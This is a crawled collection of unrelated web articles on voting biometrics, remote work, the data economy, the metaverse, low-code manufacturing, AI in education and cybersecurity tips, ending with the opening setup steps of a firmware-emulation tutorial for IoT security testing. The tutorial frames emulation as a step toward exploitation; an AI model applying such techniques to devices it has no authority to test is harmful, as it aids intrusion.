Email us here to learn more about how we can help your IT team better serve your patients and internal staff. | <urn:uuid:00470ac8-9108-401e-8037-6367d5299ef9> | CC-MAIN-2022-40 | https://coopsys.com/it-security-compliance-for-business-five-must-know-technology-advancements-in-healthcare/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00094.warc.gz | en | 0.936043 | 811 | 2.515625 | 3 |
Elections are an important form of political participation, and citizens can enhance their sense of democracy through electoral activities. With the development of technology, more and more countries are building digital government platforms, and it is becoming increasingly important to identify voters ‘identities while ensuring fairness. Some countries vote through fingerprints or ID cards, and governments need to register this identity information, as well as verify it, which requires a large amount of infrastructure, so governments are currently facing the following challenges in voting and election activities.
1. The registration and verification of citizenship data, which requires specific infrastructure to support
2. The collection of ballots in remote and mountainous areas, which requires miniaturized and mobile voting methods
3. Fraudulent voting, such as identity theft, multiple voting and other voter fraud methods and manipulation mechanisms.
In order to avoid identity theft, multiple voting and other voter fraud methods, biometric technology can be used to verify the identity of citizens, which guarantees the consistency of voter identities and their identity documents to ensure the fairness of the vote. FEITIAN launched the V10P, V11 series of products can meet these requirements perfectly. Furthermore, the 4G module on the device also provides the convenience for government officials to collect ballots from remote areas.
Ensure that real name authentication is in place to avoid identity theft, multiple voting and other voter fraud and manipulation mechanisms | <urn:uuid:2fc196c4-995f-4c2b-a5b4-7fb5efef3734> | CC-MAIN-2022-40 | https://idsolution.ftsafe.com/FT-Case-Study-02.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00094.warc.gz | en | 0.929495 | 278 | 2.828125 | 3 |
By Carl Benedikt Frey, Director of the Oxford University Future of Work program
Remote work isn’t a new phenomenon. Before the Industrial Revolution, which took off in England around 1750, the vast majority of the population worked from home. The domestic system, whereby workers make products in their own homes, was predominant in Europe and elsewhere. The typical artisan lived in a cottage with often only one room, which served as both home and workshop. Much like a gig worker today, he decided for himself when a day’s work began and when it ended. In this light, the repulsion many felt toward the factory system is easier to understand. As historian David Landes puts it, the mechanized factory, which gradually replaced the domestic system, “required and eventually created a new breed of worker, broken to the inexorable demands of the clock.”
Before the COVID-19 pandemic, the factory model of working, which the Industrial Revolution created, was still largely intact. Despite striking advances in communications technology, telework remained rare. Across the European Union, the share of the population working from home hovered between 4% and 6% throughout the 2000s and 2010s. And in the US, a recent survey by the Bureau of Labor Statistics found that only 15% of respondents ever had a full day working from home. More striking still, only 2% of employees reported ever having worked from home full time.
Over the past year, however, COVID has forced millions of workers to set up home offices. Right now, working from home accounts for a staggering more than 60% of economic activity in the US. Thus, it is hardly an exaggeration to say that we are currently undergoing the largest work experiment in history.
While the switch to remote work has been enormously disruptive for many businesses, it is likely to boost productivity growth over the medium term. As an analogy, consider the strike on the London Underground in February 2014. As many lines were closed, Londoners were forced to rethink their commutes to work. Such disruption meant that many came in late to the office, but it also brought unexpected efficiency gains over the following years.
The economists Shaun Larcom, Ferdinand Rauch and Tim Willems, found that while only 5% of commuters stuck to their new route even after the strike, the benefits from that change were long lasting, exceeding the costs produced by the strike, which was a one-off event. In similar fashion, the pandemic has forced businesses to rethink their routines and work processes, albeit on much greater scale. Virtually all large companies that can, have switched to remote work.
A key question is to what extent will we work remotely when the pandemic subsides. Indeed, it could be argued that we have seen this movie before. With the arrival of the Web in the 1990s, many thought that remote work would become the new normal. Writing in 1997, economist Frances Cairncross argued that, “In half a century’s time, it may well seem extraordinary that millions of people once trooped from one building (their home) to another (their office) each morning, only to reverse the procedure each evening ... Commuting wastes time and building capacity. One building … the home … often stands empty all day; another … the office … usually stands empty all night. All this may strike our grandchildren as bizarre.”
Others were more skeptical. In 1998, economist Edward Glaeser argued that if we want to understand the future of cities and offices, we need to understand the forces of agglomeration, and how they interact with changes in technology. Glaeser provided two key reasons for why we won’t see the end of offices and cities: digital technologies, he argued, provide poor substitutes for face-to-face meetings and sporadic interactions. However, digital technologies have made a great leap forward since Glaeser published his article. They have become much better substitutes for in-person meetings. What digital technologies are still unable to do, however, is substitute for the “watercooler moments” at the office.
There are good reasons to think that remote work will be the new normal for many. In addition to saving real estate costs and commuting time, many studies have demonstrated that people working from home are more productive. For example, one recent experiment conducted by Stanford’s Nicholas Bloom and collaborators found that remote work increased performance by 13% due to fewer breaks and sick days, and a quieter work environment. The dilemma facing businesses around the world is that while remote work can bring tangible efficiency gains, it makes innovation less likely to happen, which is what drives productivity and business performance over the long run. The most creative ideas aren’t going to come when people work productively in front of their monitors at home. The drive to improve efficiency, in other words, could imperil innovation, which is fundamentally about exploration.
This trade-off is well known to artificial intelligence (AI) researchers. How often should an AI algorithm take actions that it hasn’t tried, versus already tried actions that are expected to lead to some reward. This is a question they constantly have to grapple with. For example, when the computer program AlphaGo beat world champion Lee Sedol in 2016 in the board game Go, it did so by exploring entirely new moves that most human players had never seen being played before. In the second match against Sedol, the AI algorithm made a move so calculated that there was only a one-in-ten-thousand chance that a human player would make it. And it turned out to be a winning move.
Human innovation entails a similar process of exploration. That is why innovating industries have always been highly clustered. From Renaissance Florence, to Manchester during the Industrial Revolution, to contemporary Silicon Valley, cities have acted as “collective brains” by facilitating knowledge transmission and innovation. To be sure, the internet, together with other digital technologies like Zoom and Slack, allows people to work remotely more effectively than ever before. That is why the average geographical distance between co-applicants on the same patent has grown exponentially since the 1990s. And as digital technologies continue to improve, it stands to reason that more work will be done remotely. However, people need to meet somewhere to decide to collaborate in the first place.
Although e-meetings occur increasingly in the post-COVID era — thanks to the miracles of technology — nobody lives in cyberspace. Thus, our virtual interactions mirror our networks in the physical world. Indeed, numerous studies show that many new projects are launched when people meet randomly in various physical settings. For example, we know that collaboration and innovation suffer when important conferences are cancelled.
To realize the efficiency gains from remote work while boosting innovation, business leaders must assess which jobs and tasks are best done remotely, and when the company benefits from employees coming in to the office. To assess this in a systematic way, the remote work matrix to the right offers valuable guidance. As the matrix reveals, whether a job should be done remotely or not is best assessed along two dimensions. The first dimension relates to the importance of knowledge spillovers. In particular, tasks that entail exploration, like developing new ideas and artifacts, benefit from sporadic in-person interactions that do not happen when employees work remotely. Examples of occupations where exploration is important include the jobs of art directors, product developers and software engineers, just to name a few. It is important to remember that even if these jobs can be done remotely, it does not mean that they should be. If companies overdo remote work, innovation and productivity will suffer in the long run.
The second dimension relates to the location specificity of a task. At one extreme, a biolab technician can only do her job in a laboratory. A telemarketer, on the other hand, can work from almost anywhere. To be sure, there are many cases in between. A derivatives trader, for example, can easily work from home, but nonetheless benefits from better and faster computer systems at the office. And while a relationship manager may benefit less from in-person meetings because of knowledge spillovers, she typically needs to be close to her client base.
This matrix has been adopted and modified from Matthew Clancy (2020): The Case for Remote Work, Working Paper.
Thus, in short, tasks or roles that do not benefit from knowledge spillovers and that mustn’t be done at a specific location are best performed remotely. Indeed, they might even be offshored to low-income countries. And as these tasks are digitized and/or offshored, they will become increasingly automatable over time: AI algorithms are capable of learning from digital interactions and will gradually be able to perform more of the tasks previously done by human labor.
All the same, looking forward, the key challenge facing companies and managers will be how to harness the benefits of remote work in ways that don’t imperil innovation. Innovation can happen almost anywhere. Research shows that prohibition reduced innovation as fewer people met sporadically. Whether people work remotely or not, companies must facilitate the sporadic interactions that foster innovation, which is ultimately what drives business performance over the long run.
Giving employees the opportunity to work from home can increase productivity and well-being, as many studies have shown.
In-office hours, however, will be needed to drive innovation in many jobs. Moreover, office space must be reconceptualized to maximize the chance of unplanned encounters. If people work from home more, which they will, companies must get their employees to “collide” when they are at the office. For example, at Sky Central in London, a variety of stairs and ramps connect all spaces, which have purposefully been constructed to create multiple routing options that encourage journey variation throughout the office space. This, in turn, facilitates sporadic encounters and augments exploration, allowing both ideas and people to flow on a continuous basis.
This article was written by Carl Benedikt Frey, Director of the Oxford University Future of Work program.
For more insight from Dr. Frey, tune in to the three-part podcast series (part 1, part 2, part 3) “Redesigning Work for the Post-pandemic Age,” where he’s joined by Ben Pring, who leads Cognizant’s Center for the Future of Work, and Mariesa Coughanour, AVP & Head of Cognizant’s Intelligent Automation advisory practice. | <urn:uuid:fdb418e6-db60-4447-bf88-07d2cf26a060> | CC-MAIN-2022-40 | https://www.cognizant.com/us/en/latest-thinking/perspectives/encouraging-innovation-as-work-moves-semi-remote | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00094.warc.gz | en | 0.965045 | 2,163 | 3.28125 | 3 |
Data: An Invaluable Asset
For more than a decade, the global economy has experienced an unprecedented transformation driven by the digital economy, also known as the fourth industrial revolution. During the first wave, this transformation impacted primarily the manufacturing sector and in its second wave, it encircled services and other less digital industries. Current estimates suggest that people spend $1 million per minute on online shopping while the digital economy accounts for around 16 percent of global GDP. In the U.S., this share is 10 percent and in the past 10 years, its contribution to real GDP growth is close to 40 percent . Under current trends, by 2050, the share of the digital economy in the U.S. could reach almost 20 percent and its contribution to real output could reach almost 70 percent
At the core of the digital economy lies the intersection between data, computing power and connectivity.
Some estimates suggest that 90 percent of all the data in the world was created in the last 2 years. In fact, every day we generate 2.5 exabytes (18 zeros in one exabyte) of data, equivalent to listening to music nonstop for 285 million years. By 2025, there will be 200 zettabytes (21 zeros in one zettabyte) of data, implying far more stored bytes than observable stars in the universe or grains of sand in all of Earth’s beaches. Although humans are generating most of the data, in a few more years this will be mostly created by machines.
Data itself has little intrinsic value. However, once it is analyzed and used to make actionable decisions, it becomes an invaluable asset. The exponential growth of computing power is letting organizations to identify, store and manage massive and complex datasets. Already, around 50 percent of all corporate firm’s data is stored in the cloud. Meanwhile, artificial intelligence (AI), which in broader terms implies giving computers the ability to emulate human intelligence, along with big data, machine learning (ML) and deep learning, is allowing organizations to develop algorithms and other tools that can learn and yield predictions to solve complex tasks and make objective decisions. In the past, only large organizations could benefit from AI and ML. However, the advent of third parties offering AI as a service (AIaaS) implies that small businesses can also benefit from these trends.
"Companies willing to embrace and unleash the digital revolution amid the uncertainties will have a competitive advantage and grow significantly faster than their competitors"
Enriching AI and ML, delivering on-demand solutions, and expanding new technologies requires super-speed connectivity. The Cloud (computing services via the Internet) and the Internet of Things (IoT, interrelated devices over a network without human interaction) allow a real-time look at ongoing operations and automate processes, which can help track performance, build better strategies and improve the quality of life. For example, smart sensors allow cities to reduce congestion, saving thousands of man-hours, and conserve energy; firms can mitigate supply-chain disruptions, reducing transportation costs and improving delivery times; farmers can control moisture and light, increasing crop production. Meanwhile, wearable devices help monitor first respondents and patients, anticipating risks and saving lives.
Like all technological disruptions, the digital economy implies challenges. Despite more IoT devices than people on the planet, the World Bank estimates that 3 billion individuals remain offline and 43 percent of the world’s population do not use mobile internet. The WEF estimates that 80 percent of online content is available in just one-tenth of all languages. Uneven access to digital technologies and inequitable distribution of benefits could lead to greater concentration of market power and inequality. In addition, although technological disruption creates jobs it also destroys them. Likewise, automated AI and ML algorithms raise legal, regulatory and ethical concerns related to privacy and human biases. Last but not least, information can be stolen or misused, which can have severe destabilizing effects on financial markets, national security, elections and institutions.
Nonetheless, there are also opportunities. A study from MIT shows that data-driven decisions allow companies to reap 5 to 6 percent higher productivity and output growth rates compared to other investments. Businesses also benefit from better organizational management, faster innovation, optimized processes, new products and services, enhanced customer service, and greater value creation. At the aggregate level, economies become more efficient and grow at a faster pace. According to ITU, a 10 percent increase in digitization boosts labor productivity, total factor productivity and GDP per capita by 2.6 percent , 2.3 percent and 1.4 percent, respectively. Other benefits include energy efficiency, more sustainable growth, lower corruption, fraud detection, enhanced working environments, and greater global trade and interconnectedness. According to McKinsey Global Institute, with open data just seven industries could create $3 to $5 trillion in economic value every year, of which, $1.3 to $2.2 trillion would benefit the U.S.
Looking ahead, biometrics, dynamic pricing, hiring and retention analytics, hyper-automation, autonomous vehicles, cryptocurrencies, blockchain technologies & distributed ledgers, quantum & edge computing, bio-chips, nano-robotics, affective computers, the metaverse, virtual reality, human enhancements, nano- & low-orbit satellites, 6G networks, private space travel, green-tech, hydrogen fuel cells, graphene, mRNA vaccines, genetic engineering, and cybersecurity will expand business opportunities.
Companies willing to embrace and unleash the digital revolution amid the uncertainties will have a competitive advantage and grow significantly faster than their competitors. | <urn:uuid:3d744342-96ca-4bc2-ad48-84713c13af53> | CC-MAIN-2022-40 | https://data-integration.cioreview.com/cxoinsight/data-an-invaluable-asset-nid-35945-cid-125.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00094.warc.gz | en | 0.919257 | 1,133 | 2.8125 | 3 |
By Shelly Palmer
As we transition from the Cenozoic Era (the age of mammals) to the Metazoic Era (the age of metaverses), it should be noted that the vast majority of people entrapped and addicted to social media already live in a metaverse. Social media platforms have nothing to do with reality; the environments depict aspirational worlds where everyone is their very best self. In the metaverse (meta: to describe, verse: egotistically short for universe), everyone lives their ideal lives, visits amazing places, hangs out with incredible people, and has photographic evidence to prove it. In a metaverse, every event is epic, so even mishaps are considered exceptional. How might this evolve? Mark Zuckerberg has an idea.
What is the definition of a Metaverse?
The first time I saw the word “Metaverse” was in Neal Stephenson’s 1992 sci-fi novel “Snow Crash.” The word has evolved over the years to describe immersive virtual worlds. These environments can be experienced on your computer on a 2D screen, but are best experienced using technology such as VR (virtual reality), AR (augmented reality), XR (extended reality), MR (mixed reality), etc. This is where Facebook believes we/they are headed, and they are assembling a high-powered product team to get us/them there.
I’m not sure it’s an aspirational destination. The movie Wall-E comes to mind. It’s easy to imagine a world of couch potatoes spending so much time in the Facebook Metaverse that their limbs atrophy and they need mobility scooters to get around. Let’s hope Facebook’s product team has a better idea.
What the Metaverse isn’t
The definition above makes the assumption that a metaverse is a virtual representation of a thing we currently understand. You hear terms like “virtual world” or “virtual economy” or “virtual space.” The word “virtual” shows up a lot. These definitions are extremely limiting, as they force us to associate something familiar with something we are trying to understand.
I’m OK using metaphorical descriptions as thought starters, but describing features as above suggests that metaverses are destined to be a product of incremental innovations that augment and extend the power of our current big tech overlords. What if we’re on the cusp of a “decentralized multiverse” where each of us uses a plurality of self-sovereign identities to navigate a plurality of metaverses? Is that even a good goal? Is that where we are headed? What assumptions should we use to build our predictive framework?
The State of the Art
Hollywood has given us some fun ways to think about metaverses. Ready Player One and The Matrix are good examples. Until the Metaverse becomes a reality (that made me laugh, too), let’s look at some proto-metaverses to help us frame our thoughts about the future.
Second Life was one of the most successful proto-metaverses. Launched by Linden Lab in 2003, it was a game set in a virtual world. Sadly, the company was unprepared to deal with its explosive growth and it was crushed under the weight of its success.
The metaverse’s ties to video games have continued (and grown) to this day, as spaces designed for gameplay have hosted concerts (like in Fortnite), weddings (like in Animal Crossing), and much more. Video games are often seen as the precursor to metaverses, as the ability for users to don an avatar and digitally represent themselves in a virtual world is a core facet of many of today’s most popular games (like Roblox, in addition to the ones listed above).
Facebook’s metaverse (which is currently in an invite-only beta) is Horizon, and the immersion is handled by Oculus tech (a company Facebook spent $2 billion on in 2014). Horizon offers users the opportunity to “explore, play and create in extraordinary ways,” as in Horizon, “you’re not just a visitor. You’re part of what makes it great.”
Accenture has an internal metaverse they call “the Nth floor” for its half a million employees. It’s a single space that transcends geographical boundaries in a way that no office building ever could.
Decentraland offers a different take on the metaverse: as its name implies, it is decentralized. Its users trade in a digital currency called MANA, and virtual spaces within Decentraland have sold for the equivalent of hundreds of thousands of dollars. Decentraland’s user base has shrunk this year (from hundreds of active users at once, rather than thousands), but its basis as a platform where its creators can build (and companies like Sotheby’s can hold virtual galleries) offers a look at the metaverse that is owned and operated by its users, rather than by a central authority.
Predicting the Evolution of the Metaverse
Could the inventors of cuneiform have predicted the evolution of written communication over the next few millennia? Do not let the current state of the internet and the current limitations of web 2.0 limit your imagination. We are sure to see thousands of attempts by metaverse architects to get to the future first.
Facebook, by virtue of its gigantic size, has a very good opportunity to design and define an equally gigantic metaverse that will be accretive to its shareholders. But that doesn’t mean we are destined to live in that future. Nor does it mean that our Hollywood-informed, technologically limited preconceptions of what a metaverse is supposed to be are even close to correct.
My guess is that, as always, our technological future will be more fantastic, more amazing, and very different from our predictions. If you want to get a sense of how this may play out, start your journey by observing a group of tweens and young teens interacting with each other during a big family gathering (like a wedding). As you can see, they are so bored by where they are, they need to interact in a metaspace like Instagram or WhatsApp or Snapchat, etc. Now imagine the evolution of the space(s) they find more interesting than the reality of the event you are forcing them to attend. Now imagine them interacting with one another in a metaspace or metaverse without the need for handheld devices (glasses, contact lenses, implants, etc). Now, just keep imagining…
Shelly Palmer is the Professor of Advanced Media in Residence at Syracuse University’s S.I. Newhouse School of Public Communications and the CEO of The Palmer Group, a consulting practice that helps Fortune 500 companies with technology, media and marketing. Named LinkedIn’s “Top Voice in Technology,” he covers tech and business for Good Day New York, is a regular commentator on CNN and CNBC and writes a popular daily business blog. He’s the Co-Host of the award-winning podcast Techstream with Shelly Palmer & Seth Everett and his latest book, Blockchain – Cryptocurrency, NFTs & Smart Contracts: An executive guide to the world of decentralized finance, is an Amazon #1 Bestseller. Follow @shellypalmer or visit shellypalmer.com. | <urn:uuid:041d1b4d-0aab-4569-b0d8-f61d25574b68> | CC-MAIN-2022-40 | https://www.architectureandgovernance.com/elevating-ea/what-is-the-metaverse-a-professors-take/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00094.warc.gz | en | 0.947059 | 1,553 | 2.578125 | 3 |
Lean manufacturing seeks to eliminate or minimize waste and make the production process more efficient. The goal is to streamline production operations while improving customer satisfaction. To deliver on this goal, lean manufacturing optimizes the organization’s production process by adopting a laser focus on the customer. Overall, lean manufacturing is all about removing things that do not add value, thus delivering a product based on customers’ needs and expectations. Using a low-code platform with manufacturing can aid manufacturers in solving an array of issues.
Several studies suggest that production processes in operations only add value 5 percent of the time while the other 95 percent are waste. Waste in the production process refers to any operation that does not add value and is irrelevant to the customer. This includes transport, motion, inventory, over-processing, waiting, defects, and over-production. This is where lean manufacturing becomes critical and low-code software can aid in the process.
Benefits of Lean Manufacturing
The philosophy of lean manufacturing was developed by Toyota Production System, one of the biggest and most successful automobile manufacturers. Toyota pioneered lean manufacturing principles, including just-in-time manufacturing marked by low inventory levels, high levels of automation supervised by a few human workers to control the quality of the product (called jidoka), and reduction of downtime. Let’s take a look at a few specific benefits of lean manufacturing.
#1: Improvement in Customer Service
Adding value for the customer is the first principle of lean manufacturing. It focuses on what customers need or want and when they want it. A company can only be successful if its customers are satisfied. As long as the company provides customers with the products they need at the right time, they will keep returning, and the business will thrive.
#2: Ease of Management
One of the most significant benefits of lean manufacturing is the reduction of human resources. It focuses on achieving more with fewer people. The decrease in the workforce means there are fewer people to manage. This means that a single operator can easily manage many types of equipment. Lean manufacturing is a bottom-up approach where workers try to improve their performance.
#3: Improvement in Quality and Reduction of Defects
Reducing waste and additional costs increase product value and thus quality. Any defects in quality manufacturing are also eliminated easily.
#4: Waste Minimization
One of the essential principles of lean manufacturing is waste minimization. Reduction of waste improves the quality and speed of the production process while increasing value for the customer.
#5: Financial Savings
The reduction in waste and defects brings high financial benefits for manufacturers. The money saved can be used for quality improvement and meeting customers’ needs.
#6: Saving Supply Inventory
With higher quality materials and fewer defects, supply inventory during the production process is saved. This means saving up supply materials during the process.
What Is Low-Code Software?
The lean manufacturing approach focuses on waste reduction and optimization of the production process. To effectively implement a lean manufacturing approach, manufacturers have to minimize the usage of materials and reduce any production defects. To accomplish this, manufacturers need to effectively track all aspects of the production process, i.e., the points of highest scrap production, highest usage of materials and quality problems, etc. Manufacturers must have faster, easier ways for employees to collect data and monitor systems on the production floor or as part of the quality management process. Traditional paper forms just don’t offer the speed, accuracy, and rich data collection modern manufacturers require.
The solution is low-code/no-code software that helps manufacturers digitize the collection of data to closely track these aspects of the production process. Low-code allows employees who cannot code apps, or “citizen developers,” to quickly develop powerful apps that can track the manufacturing processes (like inventory, inspections, etc.). This allows manufacturers to adopt lean manufacturing practices at a much lower price without hiring experienced developers. In case of any market changes, citizen developers can easily upgrade the software. With low-code/no-code solutions, manufacturers can build quality apps that easily collect data on any mobile device. This allows manufacturing teams to quickly implement lean manufacturing practices more quickly, affordably, and easily.
Low-Code for Lean Manufacturing
Here are a few ways in which low-code furthers lean manufacturing.
More Agility and Greater Automation
As discussed above, quick and efficient delivery is one of the main principles of lean manufacturing. It focuses on delivering products to the customers quickly and easily without any barriers. With low-code/no-code software, manufacturers can create mobile-friendly applications almost ten times faster than with traditional app development techniques. Unlike apps developed the traditional way, low-code/no-code allows for easy and quick changes or updates. Low-code/no-code allows for automation of different processes, including job assignments, user instructions, work instructions, etc. This streamlines the entire production process, allowing managers stay-at-the-top of the incoming, completed, and delayed tasks.
Implementing Smart Factories
With the help of low-code platforms, manufacturers get access to real-time data that reflects the machine output, thus gaining greater visibility and productivity. This real-time data is also helpful in pre-empting maintenance needs, which normally require a large downtime.
Like other industries, the manufacturing sector is rapidly evolving to catch up with the incoming wave of digital transformation. The manufacturing sector is entering Industry 4.0 (smart factories) that is powered by technologies like machine learning, artificial intelligence, cloud computing, advanced analytics, etc. Low-code/no-code platforms can help in implementing smart factories by reducing data silos by integrating data from different systems into a single application, predicting real-time customer demands even in the most precarious times, and improving efficiency by interweaving all the systems and processes together.
Since the organizations get real-time signals of what’s happening on the production floor, they are in a much better place with regard to improving the efficiency of the entire process. For instance, the 5S audit app, built on low-code software, allows for a quick and efficient visual management of the working facility. 5S helps eliminate any unnecessary items, movement, inventory, and time daily. This improves the efficiency and safety of workers. Such integration of systems also helps the workers who now have to manage fewer interfaces while switching between systems.
Disorganized production processes can create chaos on the production floor. As discussed above, low-code platforms can help develop apps that provide greater visibility to the manufacturer. This allows manufacturers to track the time taken in each segment of the process and understand the best practices associated with it. Then, manufacturers can integrate the best practices into their workflows to ensure that their workers are working to a minimum working standard. Low-code apps can be customized to track workers’ activities, location, and productivity. With such access to multiple data points, both workers and managers work together to maximize their performance and productivity, which is one of the key aspects of lean manufacturing.
The Low-Code Approach
Low-code/no-code helps manufacturers implement a lean manufacturing approach and advance towards Industry 4.0 revolution. The goal is to streamline production operations while improving customer satisfaction. To effectively implement a lean manufacturing approach, manufacturers could benefit from utilizing low-code/no-code software to digitize their collection of data and closely track the production process. | <urn:uuid:c0bebf7e-1b9f-48aa-9101-9295e3b59f82> | CC-MAIN-2022-40 | https://www.iotforall.com/understanding-the-benefits-of-using-low-code-platform-for-lean-manufacturing | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00094.warc.gz | en | 0.937312 | 1,526 | 2.75 | 3 |
As we settle in from last week’s Texas Computer Education Association TEC-SIG Summit, the largest special interest group established in 1989 for the purpose of providing a means of communication between technology coordinators, instructional technology leaders, and other administrators throughout the state, we’d like to continue the conversations around AI in education.
While artificial intelligence (AI) is yet to permeate our lives on the scale seen in movies such as I, Robot or Minority Report, it’s already widely deployed in numerous industries such as the gambling, car manufacturing, online gaming, technology, retail, healthcare, and financial services industries.
One sector it is tipped to disrupt next is education, long overdue for a shakeup in an era when students are being outperformed in core STEM subjects (science, technology, engineering, and math) by students in a large number of other OECD (Organization for Economic Co-operation and Development) countries.
Key benefits of AI in the classroom
Traditional methods of teaching, or the “mass education” method (untailored to each student’s specific needs) are failing us.
AI’s benefits in the classroom include:
- Bespoke learning: AI can be used to “data-mine” a cohort’s results – or an individual’s – to determine common areas requiring additional or tailored teaching. AI in the areas of language acquisition, math and science (subjects with more fixed rules than a more subjective subject, such as English literature) is already widely available in software applications for fixed PCs and mobile devices.
- Universal access: Education AI holds great promise for helping disadvantaged students “close the gap,” and it can take many forms. For example, it might power apps that can deliver a school syllabus digitally, combining text with video or images; or allow disabled students, or those living in remote or rural areas, to better access educational resources. Further, global learning programs such as Mathletics or Duolingo enable students across the world to interact and learn in a virtual environment.
- Freeing up teachers for more “human-centered” learning: With the rise of education AI and the ability to have an online tutor or knowledge repository that is attuned to your strengths and weaknesses available 24/7, teachers will be freed up to pass on human skills that AI can’t teach such as socialization, negotiation, and prioritization of tasks. With AI already capable of grading multiple-choice exams and running online-testing programs, educators have the potential to spend less time marking, and more time teaching.
Key concerns of AI in education
While AI has great potential to enhance the education sector, the following are some key concerns requiring further consideration by tech developers, governments, and educators globally:
- Education AI can itself be disrupted: Machine-based learning is subject to the availability of internet connectivity and power, and vulnerable to hacking, viruses and systems, and software glitches.
- Lack of integration between tech companies, governments, and educators: Where the technology companies behind the rise of education AI fail to take into account the concerns, methods, and findings of real-world educators and governments, the resulting technology may give rise to moral or ethical concerns.
- Privacy and data security: As the rise of AI in education in the mainland Chinese context demonstrates, facial-recognition technology in the classroom can be used to track the engagement of students during class time. But the flip side of this is increased surveillance and data gathering on individuals, the implications of which are as yet unknown.
The rise of AI in education has vital implications for greater student and teacher support, and universal accessibility to educational resources. But tech companies, governments, and educators need to engage in greater dialogue and co-contribution to this burgeoning area of tech to ensure that education AI remains human-centered – or the future envisioned by science fiction movies may result.
*content courtesy of OneAffiniti funded by Citrix | <urn:uuid:3a6dc433-34d9-437a-82d2-f64a40d22d22> | CC-MAIN-2022-40 | https://logicalfront.com/ai-education-trends-implications/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00094.warc.gz | en | 0.938643 | 819 | 3.46875 | 3 |
It’s the last day of October, which means this year’s National Cybersecurity Month is officially ending. But that doesn’t mean you should stop taking measures to #StayCyberSafe! This year, the NCSAM theme was “Own IT, Secure IT, Protect IT” – let’s take a look at some of the tips that were presented this month.
We’re almost constantly connected, whether at home, at work, at school, or even on vacation. With mobile phones and Internet of Things devices, there are more ways to be connected than ever before. Not only that, we also have many accounts which collect our information.
- Don’t overshare on social media. #BeCyberSmart about where you share your information and who you share it with. Connect only with people you know and trust.
- Set privacy and security settings to limit what your devices and social media accounts share about you.
- Keep tabs on your apps; only download from legitimate, trusted sources. Review the permissions those apps are asking for, and deny any that don’t make sense.
Security breaches seem to be happening more and more often; they’re hardly front page news any more. Your personal information is valuable, so do what you can to keep it out of the hands of cyber criminals.
- Use strong passwords, and don’t use the same password on multiple accounts. A password manager can help you keep track of all those strong, unique passwords for your accounts. Some can even help you share access with trusted partners or family members, without requiring you to give them the password.
- No matter how strong your password is, if a breach occurs, your account may be vulnerable. Enable multi-factor authentication to add another layer of security and help ensure the only person who can access your account is you.
- Don’t get hooked by a phishing scam! Be very cautious when opening emails, and never click on links or attachments sent by people you don’t know. Even if the email looks like it’s from a friend, coworker, or your boss, be wary of clicking on links. Scammers can spoof email addresses, so it’s best to check the legitimacy of the email, especially if it’s urging you to click or open something right away.
While today’s technology allows us to shop, bank, communicate, and entertain ourselves anywhere, this convenience comes with an increased risk. Smart home devices, such as thermostats, door locks, and cameras can make our lives easier and save time and money, but be aware of the additional security risk that comes with these smart devices.
- Your wireless router is the main entryway to all your connected devices, so be sure to change the default user name and password, keep the firmware up to date, and set a password on your Wi-Fi network. Also, change the default credentials on all your smart devices, and make sure you understand the permissions and access they have to your network, your information, and your personal space. Assume a smart speaker is always listening, and a smart camera is always watching.
- Keep software and firmware on all your devices up to date. Your computer, smart phone, router, and many smart home devices get updates to help keep them protected from ever-changing threats. If you have an older device, make sure it’s still being supported; sometimes, it’s just time to get rid of that old streaming device to help protect the rest of your home.
- Public Wi-Fi is not safe or secure. Even a public Wi-Fi network with a password could be compromised. If you must use public Wi-Fi, be sure it’s the actual network provided by the location. Use a VPN service to protect the privacy of the information you’re sending, and avoid accessing sensitive accounts such as financial and banking accounts while on public Wi-Fi.
As we move into the holiday season and the new year, keep these cyber security tips in mind. OWN IT, Secure IT, and Protect IT to keep yourself and your family #CyberSafe. | <urn:uuid:165badf6-040c-4a7e-ab12-9a2fdb266e29> | CC-MAIN-2022-40 | https://milepost42.com/cybersecurity/national-cybersecurity-month-wrap-up/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00094.warc.gz | en | 0.920435 | 876 | 2.546875 | 3 |
In this post, we will have a look at how we can perform Firmware Emulation of a given IoT device.
Firmware Emulation can serve a number of different purposes such as analyzing the firmware in a better way, performing exploitation, performing remote debugging and so on.
With this technique, you can emulate a Firmware originally meant to be run on a different architecture, and interact with it, even without having a physical IoT device.
One of the earlier ways of performing Firmware Emulation was to create a Qemu image and then copy the firmware file system's contents on to the Qemu image and then launch the image.
However, there exists a much simpler alternative which is also prone to give you lesser issues while emulating firmware. Let's have a look.
Tools that you would require:
- AttifyOS VM or any Linux based image
- Firmware Analysis Toolkit (https://github.com/attify/firmware-analysis-toolkit)
- A firmware that you want to emulate (for ex - Netgear WNAP320 )
Setting things up
Once you have all three of the above components, the first step is to set up Firmware Analysis Toolkit.
Firmware Analysis Toolkit is simply a wrapper around the actual project Firmadyne and automates the process of emulating a new firmware.
To download and install FAT, simply clone the git repository recursively as shown below:
git clone --recursive https://github.com/attify/firmware-analysis-toolkit.git
Next, we will need to setup the individual tools such as Binwalk, Firmadyne and Firmware-Mod-Kit.
Set up Binwalk
To Set Up Binwalk, simply install the dependencies as below and then go ahead and install the tool :
cd firmware-analysis-toolkit/binwalk sudo ./deps.sh sudo python setup.py install
If everything went well, you would be able to run
binwalk and receive an output as shown below.
Set up Firmadyne
To setup Firmadyne, navigate to the Firmadyne folder and open up
firmadyne.config. It should look as shown in the picture below.
Uncomment the line saying
FIRMWARE_DIR=/home/vagrant/firmadyne/ and modify the address to the current path of Firmadyne. The updated line in my case looks like as shown below.
Once you have updated the path, the next step is to download the additional binaries required for Firmadyne to work. This might take a while (1-2 mins on a good internet connection) - so have a coffee (or beer) at this point of time.
